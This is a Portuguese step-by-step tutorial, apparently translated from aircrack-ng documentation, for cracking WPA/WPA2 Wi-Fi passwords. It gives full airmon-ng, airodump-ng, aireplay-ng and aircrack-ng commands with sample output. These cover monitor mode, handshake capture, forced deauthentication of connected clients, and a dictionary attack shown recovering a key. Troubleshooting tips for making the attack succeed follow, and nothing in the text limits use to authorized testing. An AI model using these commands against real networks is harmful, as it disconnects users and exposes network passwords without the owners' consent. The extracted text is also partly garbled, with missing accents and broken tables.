Passo 1 Iniciar a interface wireless em modo monitor

O proposito deste passo colocar a sua placa de rede wireless no que chamamos de modo monitor.
O modo monitor o modo pelo qual a sua placa wireless pode escutar todos os pacotes que passam
pelo ar. Normalmente sua placa wireless desejar somente ouvir pacotes endereados para voc.
Escutando todos os pacotes, ns poderemos mais tarde capturar o modo handshack(como se fosse
um aperto de mos). Bem, isto nos permitir opcionalmente desautenticar um cliente wireless
(algum conectado) em um passo mais tarde.
O procedimento exato para habilitar o modo monitor varia dependendo do driver que voc est
usando. Para determinar o driver (e o procedimento correto para seguir), execute o seguinte
comando:
# airmon-ng
Em uma mquina com placas wireless Ralink, Atheros e uma Broadcom instalada, o sistema responde:
Interface
Chipset
Driver
rausb0
wlan0
wifi0
ath0

Ralink RT73
Broadcom
Atheros
Atheros

rt73
b43 [phy0]
madwifi-ng
madwifi-ng VAP

(parent: wifi0)

A presena da tag [phy0] no final do nome do driver um indicador para o driver mac80211. Ento
a placa de rede wireless est usando o driver mac80211. Note que o driver mac80211 suportado
somente a partir da verso v1.0-rc1 e no funcionar com a verso v.0.9.1.
Ambas entradas das placas wireless Atheros mostram o driver denominado madwifi-ng. Siga os
passos para montar a placa wireless Atheros com as informaes contidas em madwifi-ng-specific
(o qual deve ser um arquivo que vem junto com o driver).
Finalmente, a placa de rede wireless Ralink no mostra nenhum destes indicadores. Esta usa o
driver ieee80211. Veja as instrues genricas para mont-la.
Passo 1a Primeiro modo de montar a interface wireless em modo monitor, usando o driver
madwifi-ng
Primeiramente pare a interface ath0 entrando com o comando abaixo:

# airmon-ng stop ath0

O sistema responder:
Interface
Chipset
wifi0
ath0

Atheros
Atheros

Driver
madwifi-ng
madwifi-ng VAP (parent: wifi0) (VAP destroyed)

Digite o comando iwconfig para se certificar de que no existe outra interface athX.
Aps digitar iwconfig e teclar Enter o sistema responder:
lo
no wireless extensions.

eth0
wifi0

no
no

wireless
wireless

extensions.
extensions.

\\Se existir alguma interface remanescente, ento pare cada uma. Quando voc finalizar, rode
iwconfig novamente para se certificar de no ter deixado nenhuma.
Agora, entre com o comando abaixo para inicializar a placa de rede wireless no canal 9 em modo
monitor:
# airmon-ng start wifi0 9
Obs.: Neste comando ns usamos wifi0 ao invs de nossa interface wireless ath0. Isto porque o
driver madwifi-ng est usando wifi0.
O sistema ir responder:
Interface
Chipset
wifi0
ath0

Atheros
Atheros

Driver
madwifi-ng
madwifi-ng VAP (parent:wifi0) (monitor mode enable)

Voc pode notar acima que ath0 est sendo mostrado que est no modo monitor. Para confirmar
de que a interface est apropriadamente ajustada, entre com o comando iwconfig.
O sistema responder:
lo no wireless extensions.
wifi0

no wireless extensions.

eth0

no wireless extensions.

ath0

IEEE 802.11g ESSID:"" Nickname:""

Mode:Monitor Frequency:2.452 GHz Access Point: 00:0F:B5:88:AC:82
Bit Rate:0 kb/s
Tx-Power:18 dBm
Sensitivity=0/3
Retry:off
RTS thr:off
Fragment thr:off
Encryption key:off
Power Management:off
Link Quality=0/94 Signal level=-95 dBm Noise level=-95 dBm
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0
Missed beacon:0

Na resposta acima voc pode ver que ath0 est no modo monitor, com frequncia de 2.452GHz
que o canal 9. O parmetro Access Point mostra o endereo MAC da placa wireless. Somente o
driver madwifi-ng mostra o endereo MAC da placa de rede wireless como parmetro do campo
AP, outros drivers no. Ento, tudo est OK. importante confirmar todas estas informaes, as
quais so prioritrias para o procedimento, seno os passos seguintes no podero funcionar (serem
executados) apropriadamente.
Para escolher a freqncia do canal d uma olhada na Tabela 1 no final deste tutorial.

Passo 1b Segundo modo de montar a interface wireless em modo monitor, usando o driver
mac80211
Diferente do driver madwifi-ng, voc no precisar desmontar a interface wlan0 quando montar o
driver mac80211. Em vez disso use o seguinte comando para montar a placa de rede em modo
monitor no canal 9:
# airmon-ng start wlan0 9
O sistema responder:
Interface

Chipset

Driver

wlan0

Braodcom

b43 [phy0] (monitor mode enable on mon0)

Note que airmon-ng habilita o modo monitor em mon0. Logo, o nome correto da interface a ser
usado mais tarde nas partes deste tutorial ser mon0.
Wlan0 est ainda um modo regular (modo gerenciado) e poder ser usado de forma casual. Voc
poder encontrar a expresso wlan0 ao invs de mon0 para mostrar que voc est no mesmo
canal que o AP o qual voc est atacando.
Para confirmar o sucesso do ajuste execute iwconfig. A seguinte saida dever aparecer:
lo

no

wireless

extensions.

eth0

no

wireless

extensions.

wmaster0

no

wireless

extensions.

wlan0

IEEE 802.11bg ESSID:""

Mode:Managed Frequency:2.452 GHz Access Point: Not-Associated
Tx-Power=0 dBm
Retry min limit:7
RTS thr:off Fragment thr=2352 B
Encryption key:off
Power Management:off
Link Quality:0 Signal level:0 Noise level:0
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0
Missed beacon:0

mon0

IEEE 802.11bg Mode:Monitor Frequency:2.452 GHz Tx-Power=0 dBm

Retry min limit:7
RTS thr:off Fragment thr=2352 B
Encryption key:off
Power Management:off
Link Quality:0 Signal level:0 Noise level:0
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0
Missed beacon:0

Aqui, mon0 visto como estando em modo monitor no canal 9 (2.452GHz). Diferente de madwifing, as saidas acima no tem o campo AccessPoint. Note tambm que wlan0 est ainda presente e
em modo gerenciado Isto normal porque ambas as interfaces compartilham o radio(AP) comum,
Elas devem ser ajustadas para o mesmo canal trocando o canal de uma interface, tambm trocar o
canal da outra.

Passo 1c Terceiro modo de montar a interface wireless em modo monitor, usando outros
drivers
Para outros drivers (baseado em ieee80211, por exemplo), simplesmente execute o seguinte
comando para habilitar para o modo monitor (use o nome de sua interface de rede ao invs de
rausb0):
# airmon-ng start rausb0 9

O sistema responder:
Interface

Chipset

rausb0

Ralinkrt

Driver
73 (monitor mode enalble)

Neste ponto, a interface dever est pronta para uso.

Passo 2 Iniciar o airodump-ng em um canal de um AP com filtro para bssid

para coletar autenticaes handshake
O propsito deste passo executar o airodump-ng para capturar pacotes dos 4 modos de
autenticao ( do tipo handshake) com o AP no qual estamos interessados.
A autenticao handshake feita de uma s vez.
Entre com o comando abaixo:
# airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w psk ath0

Onde:
-c 9 o canal para a rede wireless;
bssid 00:14:6C:7E:40:80 o endereo MAC do ponto de acesso. Esta opo elimina
traficos estranhos;
-w psk o nome do prefixo do arquivo para o arquivo que ir conter os IV s (pacotes
trafegados);
ath0 o nome da interface.
Importante:
No use a opo - -ivs. Voc deve capturar os pacotes completos.
Se quiser, no precisar usar o filtro bssid <MAC do AP>, da, voc vai capturar todos os pacotes
wireless que estiverem ao seu alcance, da ento escolher um AP com o seu respectivo endereo
MAC, que vai aparecer para voc.
Abaixo est o que parece ser, se um cliente wireless estiver conectado na rede:
CH 9 ] [ Elapsed: 4 s ] [ 2007-03-24 16:58 ] [ WPA handshake:
00:14:6C:7E:40:80
BSSID
PWR
RXQ Beacons #Data,
#/s CH
MB ENC
CIPHER
AUTH ESSID
00:14:6C:7E:40:80
39
100
51
116
14
9
54 WPA2 CCMP
PSK
teddy
BSSID
STATION
PWR
Lost
Packets
Probes
00:14:6C:7E:40:80
00:0F:B5:FD:FB:C2
35
0
116

Na saida acima note que WPA handshake: 00:14:6C:7E:40:80 est no topo direita. Isto quer
dizer que airodump-ng capturou os pacotes de autenticao handshake com sucesso.
Abaixo ser mostrado como ocorre quando um cliente no est conectado:
CH 9 ] [ Elapsed: 4 s ][ 2007-03-24 17:51
BSSID
PWR RXQ
Beacons
#Data,
CIPHER
AUTH
ESSID
00:14:6C:7E:40:80
39
100
51
0
CCMP
PSK
teddy
BSSID
STATION
PWR Lost

#/s

CH

MB

ENC

54

WPA2

Packets

Probes

Dicas de resoluo de problemas:

Para ver se voc capturou algum pacote de autenticao (tipo handshake), existem duas maneiras.
1 Veja que na tela de sada do airodump-ng a informao WPA handshake:
00:14:6C:7E:40:80 est no top direita. Isto quer dizer que os pacotes de autenticao
(tipo handshake) foram capturados com sucesso. Veja nos exemplos acima.
2 Use o programa Wireshark e aplique um filtro para eapol. Isto far com que seja
mostrado na tela somente os pacotes eapol que voc est interessado, assim voc pode ver
se a captura contm 0,1,2,3 ou 4 pacotes eapol.

Passo 3 Usar o aireplay-ng para desautenticar um cliente wireless

Este passo opcional. Se voc for paciente, voc poder esperar at que o airodump-ng capture os
pacotes de autenticao handshake quando um ou mais clientes se conectar ao AP. Voc somente
executar este passo se voc optar por acelerar a atividade do processo. A outra restrio que
dever existir um cliente wireless associado ao AP. Se no existir um cliente corretamente associado
com o AP, ento voc dever ser paciente e esperar por algum conectar ao AP, ento os pacotes de
conexo com o AP podero ser capturados. Desnecessrio dizer, que se um cliente wireless se
conectou e o airodump-ng no capturou os pacotes de conexo handshake, voc poder voltar a
executar este passo do incio para que ele possa capturar, estando o cliente j conectado.
Este passo envia uma mensagem para o cliente wireless desconectando-o com o AP, mas uma
desconexo rpida. O cliente wireless ento se re-autenticar com o AP . A re-autenticao que
gera os pacotes de autenticao handshake que ns estamos interessado em coletar. Estes pacotes
so o que precisamos para quebrar a senha correspondente a chave compartilhada WPA/WPA2.
Baseado na informao de sada do airodump-ng referida no passo anterior, voc determina um
cliente que est corretamente conectado. Voc precisa do endereo MAC para os passos seguintes.
Abra um outro console e tecle o comando abaixo:
# aireplay-ng -0 1 -a 00:14:6C:7E:40:80

-c

00:0F:B5:FD:FB:C2

ath0

Onde:
-0 significa desautenticao;
1 o nmero de desautenticao que voc deseja para ser enviado (voc pode enviar
mltiplos se voc quiser);
-a 00:14:6C:7E:40:80 o endereo MAC do AP;
-c 00:0F:B5:FD:FB:C2 o endereo MAC do cliente que voc vai desautenticar;

 ath0 o nome da interface.

Abaixo mostrado como ficar a sada do comando:
11:09:28

Sending DeAuth to station

- - STMAC:

[00:0F:B5:34:30:30]

Com sorte isto causar uma reautenticao do cliente wireless e produzir os pacotes de
autenticao handshake.
Dica de resoluo de problemas:
Os pacotes de desautenticao so enviados diretamente do seu PC para o cliente. Logo voc dever
est fisicamente prximo ao cliente para que a transmisso de sua placa de rede wireless o alcance
(alcance o cliente). Para confirmar se o cliente recebeu os pacotes de desautenticao, use o
tcpdump ou similar para ver os pacotes ACK que voltaram do cliente. Se voc no obteve pacotes
ACK de volta, ento o cliente no ouviu o pacote de desautenticao.

Passo 4 - Rodar o aircrack-ng para craquear a chave pre-compartilhada usando

a autenticao handshake
O propsito deste passo atual craquear as chaves pre-compartilhadas WPA/WPA2. Para isto, voc
precisar de um dicionario de palavras (word list). Basicamente, o aircrack-ng pega cada palavra e
testa para ver se esta de fato a chave pre-compartilhada. Existe um pequeno dicionario que vem
com o aircrack-ng password.lst. Este arquivo pode ser encontrado no diretrio de test, que
contm os codigos fonte do aircrack-ng. Voc pode usar o John the Ripper (JRP) para gerar sua
prpria word list e us-la no aircrack-ng. O uso do JRT em conjunto com o aircrack-ng est alm
do escopo deste tutorial.
Abra um outro console e entre com o comando abaixo:
# aircrack-ng -w password.lst -b 00:14:6C:7E:40:80 psk*.cap

Onde:
-w password.lst o nome do arquivo dicionario. Lembre de especificar o caminho completo
se o arquivo no estiver localizado no mesmo diretrio;
*.cap o nome do grupo de arquivos que contm os pacotes capturados. Note que neste
caso, ns usamos um coringa * para incluir mltiplos arquivos.
Abaixo est sendo mostrado a saida do comando quando um pacote handshake no for
encontrado:
Opening psk-01.cap
Opening psk-02.cap
Opening psk-03.cap
Opening psk-04.cap
Read 1827 packets
No valid WPA handshakes found.

Quando isto acontecer ou voc ter que refazer o passo 3 (desautenticar o cliente wireless) ou
esperar mais tempo se voc estiver usando a abordagem passiva. Quando usamos a abordagem
passiva, voc deve esperar at que um cliente wireless se autentique no AP.

Aqui abaixo est a sada quando um pacote handshake encontrado:

Opening psk-01.cap
Opening psk-02.cap
Opening psk-03.cap
Opening psk-04.cap
Read 1827 packets.
#
BSSID
ESSID
1
00:14:6C:7E:40:80 teddy
Choosing first network as target.

Encryption
WPA (1 handshake)

Agora neste ponto, o aircrack-ng iniciar a tentativa de craquear a chave pre-compartilhada.

Dependendo da velocidade de sua CPU e do tamanho do dicionario de palavras (word list), isto
poder levar algum tempo, at mesmo dias.
Abaixo mostrado o sucesso do craqueamento de uma chave pre-compartilhada:
Aircrack-ng
[00:00:00]

k/s)

Master Key

CD
B8

keys

tested

(37.20

KEY FOUND
[ 12345678 ]
0D 11 8E AC AA C5 C5 EC BB 59 85 7D 49 3E
13 C5 4A 72 82 38 ED C3 7E 2C 59 5E AB FD

69
A6

Transcient Key :

06
CE
FF
2B

EAPOL HMAC

4E 27 D9 5B 00 91 53 57 88 9C 66 C8 B1 29 D1 CB

F8
8A
1D
20

0.8

BB
9D
41
90

F3
A0
E1
8C

B1
FC
65
EA

55
ED
17
32

AE
A6
93
15

EE
DE
0E
A6

1F
70
64
26

66
84
32
62

AE
BA
BF
93

51
90
25
27

1F
83
50
66

F8
7E
D5
66

12
CD
4A
E0

98
40
5E
71

Dicas de resoluo de problemas

Problema:
No consigo captura os pacotes de conexo do tipo handshake!
Algumas vezes pode ser difcil capturar os pacotes de conexo handshake.
Aqui esto algumas dicas de soluo:
Sua placa de rede, que est no modo monitor, dever est no mesmo tipo de conexo
(802.11a , b ou g) que o cliente e o AP. Por exemplo, se sua placa est em b e o cliente/AP
usa o tipo g, ento voc no capturar os pacotes handshake (isto j est superado por que
as placas trabalham hoje em modo b e g, com seleo automtica e se a placa consegue
trabalhar em g, logicamente ela trabalhar em a ou b, diferentemente se esta trabalhar
somente em b, no vai conseguir trabalhar em a ou g, o mesmo se aplica ao modo
a). Isto especialmente importante para novos AP/clientes que podem est no modo
turbo e/ou outros padres.
Alguns drivers permitem a voc especificar o modo (a, b ou g). Tambm o comando
iwconfig tem uma opo chamada modulation que pode algumas vezes ser usada. Digite

man iwconfig no seu console para ver as opes para modulation. Para nossa
informao, as velocidades de conexo 1, 2, 5.5 e 11Mbit so b; e para as velocidades 6, 9,
12, 18, 24, 36, 48 e 54Mbit so g;
Algumas vezes voc tambm precisar ajustar a placa de rede wireless no modo monitor e
na mesma velocidade do AP. Voc poder fazer isto especificando com a opo -c <canal
do AP> quando inicializar o comando airodump-ng;
Certifique-se de no haver conexes gerenciadas (placas ativas e que no estejam em modo
monitor) rodando em seu sistema. Isto pode fazer com que o seu canal ou modo seja mudado
sem seu conhecimento;
Voc dever est suficientemente prximo para receber pacotes tanto do cliente wireless
como do AP. O alcance da placa de rede wireles tipicamente menor que o alcance de um
AP;
Por outro lado, se voc estiver muito prximo, ento os pacotes recebidos podem ser
corrompidos e descartados. Logo voc no poder est muito prximo;
Dependendo do driver, alguns drivers de verses mais velhas, no iro capturar todos os
pacotes;
Idealmente, conectar e desconectar um cliente wireless normalmente gera uma conexo do
tipo handshake;
Se voc usa a tcnica de desautenticao, enviando o mnimo de pacotes far com que o
cliente se reautentique. Normalmente este um pacote simples de desautenticao.
Enviando um excessivo nmero de pacotes de desautenticao far com que o cliente no
consiga se re-autenticar (reconectar ao AP) e ento no gerar os pacotes de autenticao
handshake. Para confirmar que o cliente recebeu os pacotes de desautenticao, use o
tcpdump ou similar para verificar por pacotes ACK que voltaram do cliente (resposta do
cliente aps voc ter enviado os pacotes de desautenticao). Se voc no obteve os pacotes
de resposta, ento o cliente no ouviu os pacotes de desautenticao;
Tente parar o radio na estao do cliente e reinici-lo;
Certifique-se que voc no est rodando nenhum outro programa/processo que possa
interferir no gerenciamento da conexo, como Kismet, etc;
Revise suas capturas de dados. Veja se esto faltando pacotes vindos do AP ou do cliente
wireless, etc.

Infelizmente, algumas vezes voc precisar capturar vrios bits pela sua placa de rede wireless at
que propriamente consiga capturar os pacotes de conexo handshake. O ponto , se voc no
conseguir craquear a rede na primeira tentativa, tenha paciencia e continue tentando. Com certeza
voc conseguir.
Uma outra abordagem, o uso do Wireshark para revisar e analisar seus pacotes capturados. Isto
pode algumas vezes te dar algumas dicas, como o que est acontecendo de errado e ter algumas
ideias em como corrigi-los.
Em um mundo ideal, voc deveria ter um dispositivo wireless dedicado para captura de pacotes.
Isto por causa de alguns drivers tais como o RTL8187L que so ruins para capturar pacotes mas
faz com que as placas de rede contendo este driver envie pacotes automaticamente (ou seja, so
bons para enviar mas ruins para capturar).
J os driver que usam RT73 so drivers ruins para capturar pacotes de clientes wireless.

Quando usamos o Wireshark, com filtro para eapol ir rapidamente mostrar na tela somente os
pacotes EAPOL. Baseado no que os pacotes EAPOL foram capturados, determine o seu plano de
correo. Por exemplo, se voc perdeu ou est faltando pacotes de clientes wireless ento tente
determinar o porqu e como coletar pacotes wireless.
Se quiser coletar todos os pacotes, voc deve iniciar o airodump-ng sem o filtro BSSID e ento ir
iniciar a captura de todos os pacotes, no s os IV s. Desnecessrio dizer que, dever est no mesmo
canal do AP. A razo de eliminar o filtro BSSID para se certificar que todos os pacotes, incluindo
ACK, foram capturados.
Todos os pacotes enviados ao cliente ou AP devem ser ACK (pacotes de conexo handshake). Isto
feito com acknowledment pacotes que tem como destinao o endereo MAC do dispositivo que
enviou o pacote original. Isto confirma que o cliente recebeu o pacote de desautenticao. Falha no
recebimento de pacotes ack infelizmente quer dizer que o cliente est fora de rea de transmisso.
Para analisar pacotes capturados impossvel criar instrues detalhadas. Esta uma rea que exige
esforo prprio para se desenvolver habilidades em interpretar conexes WPA/WPA2, acrescido de
conhecimentos em como usar o Wireshark.
Se o aircrack-ng declarar: 0 handshakes
Verifique a dica de resoluo de problemas Eu no consigo capturar os quatros modos de conexo
Handshak !
Se o aircrack-ng declarar: Nenhuma conexo handshake WPA vlida foi encontrada
Verifique a dica de resoluo de problemas Eu no consigo capturar os quatros modos de conexo
Handshak !
Tabela 1
Wireless Frequencies and Channels
________________________________________________________________________________
________
Frequency
Channel Number
Frequency
Channel
Number
2.412 GHz
1
2.484 GHz
14
2.417 GHz
2
5.180 GHz
36
2.422 GHz
3
5.200 GHz
40
2.427 GHz
4
5.220 GHz
44
2.432 GHz
5
5.240 GHz
48
2.437 GHz
6
5.260 GHz
52
2.442 GHz
7
5.280 GHz
56
2.447 GHz
8
5.300 GHz
60
2.452 GHz
9
5.320 GHz
64
2.457 GHz
10
5.745 GHz
149
2.462 GHz
11
5.765 GHz
153
2.467 GHz
12
5.785 GHz
157
2.472 GHz
13
5.805 GHz
161
________________________________________________________________________________
________